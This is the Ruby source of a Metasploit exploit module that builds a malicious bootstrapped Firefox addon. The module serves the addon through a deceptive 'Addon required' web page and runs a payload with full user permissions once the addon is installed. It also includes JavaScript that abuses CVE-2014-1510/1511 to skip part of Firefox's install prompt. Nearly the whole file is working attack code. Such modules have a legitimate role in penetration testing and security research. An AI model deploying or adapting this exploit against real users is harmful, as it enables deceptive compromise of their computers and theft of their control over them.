114 lines
4.0 KiB
Ruby
114 lines
4.0 KiB
Ruby
##
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
require 'rex'
|
|
require 'rex/zip'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
include Msf::Exploit::Remote::FirefoxAddonGenerator
|
|
|
|
def initialize( info = {} )
|
|
super( update_info( info,
|
|
'Name' => 'Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution',
|
|
'Description' => %q{
|
|
This exploit dynamically creates a .xpi addon file.
|
|
The resulting bootstrapped Firefox addon is presented to
|
|
the victim via a web page. The victim's Firefox browser
|
|
will pop a dialog asking if they trust the addon.
|
|
|
|
Once the user clicks "install", the addon is installed and
|
|
executes the payload with full user permissions. As of Firefox
|
|
4, this will work without a restart as the addon is marked to
|
|
be "bootstrapped". As the addon will execute the payload after
|
|
each Firefox restart, an option can be given to automatically
|
|
uninstall the addon once the payload has been executed.
|
|
|
|
On Firefox 22.0 - 27.0, CVE-2014-1510 allows us to skip the
|
|
first half of the permissions prompt.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [ 'mihi', 'joev' ],
|
|
'References' =>
|
|
[
|
|
[ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],
|
|
[ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ],
|
|
[ 'CVE', '2014-1510' ], # webidl chrome:// navigation to skip first half of prompt
|
|
[ 'CVE', '2014-1511' ]
|
|
],
|
|
'DisclosureDate' => 'Jun 27 2007'
|
|
))
|
|
end
|
|
|
|
def on_request_uri(cli, request)
|
|
if request.uri.match(/\.xpi$/i)
|
|
# browser has navigated to the .xpi file
|
|
print_status("Sending xpi and waiting for user to click 'accept'...")
|
|
if not xpi = generate_addon_xpi(cli)
|
|
print_error("Failed to generate the payload.")
|
|
send_not_found(cli)
|
|
else
|
|
send_response(cli, xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
|
|
end
|
|
else
|
|
# initial browser request
|
|
# force the user to access a directory-like URL
|
|
if not request.uri.match(/\/$/)
|
|
print_status("Redirecting request." )
|
|
send_redirect(cli, "#{get_resource}/")
|
|
else
|
|
# user has navigated
|
|
print_status("Sending response HTML." )
|
|
send_response_html(cli, generate_html)
|
|
end
|
|
end
|
|
|
|
handler(cli)
|
|
end
|
|
|
|
def generate_html
|
|
%Q|
|
|
<html><head><title>Loading, Please Wait...</title></head>
|
|
<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>
|
|
<div style='visibility:hidden;width:1px;height:1px;'>
|
|
<iframe name='f'></iframe>
|
|
</div>
|
|
<script>
|
|
function install() {
|
|
window.location.href="addon.xpi";
|
|
}
|
|
#{web_idl_navigation}
|
|
</script>
|
|
</body>
|
|
</html>
|
|
|
|
|
end
|
|
|
|
# In firefox 21 - 27, there is a vulnerability that allows navigation to a chrome:// URL.
|
|
# From there you can load the browser XUL, and inject a data URL into a nested frame.
|
|
# If the data URL opens the .xpi URL, the first permission prompt gets skipped.
|
|
def web_idl_navigation
|
|
%Q|
|
|
try {
|
|
c = new mozRTCPeerConnection;
|
|
c.createOffer(function(){},function(){window.rr=window.open('chrome://browser/content/browser.xul', 'f')});
|
|
setTimeout(function(){
|
|
try {
|
|
frames[0].frames[1].location="data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
|
|
"{},function(){window.open('#{get_uri.chomp('/')}/addon.xpi', '_self');});<\\/script>";
|
|
} catch(e) {
|
|
install();
|
|
}
|
|
},600);
|
|
} catch(e) {
|
|
install();
|
|
}
|
|
|
|
|
end
|
|
end
|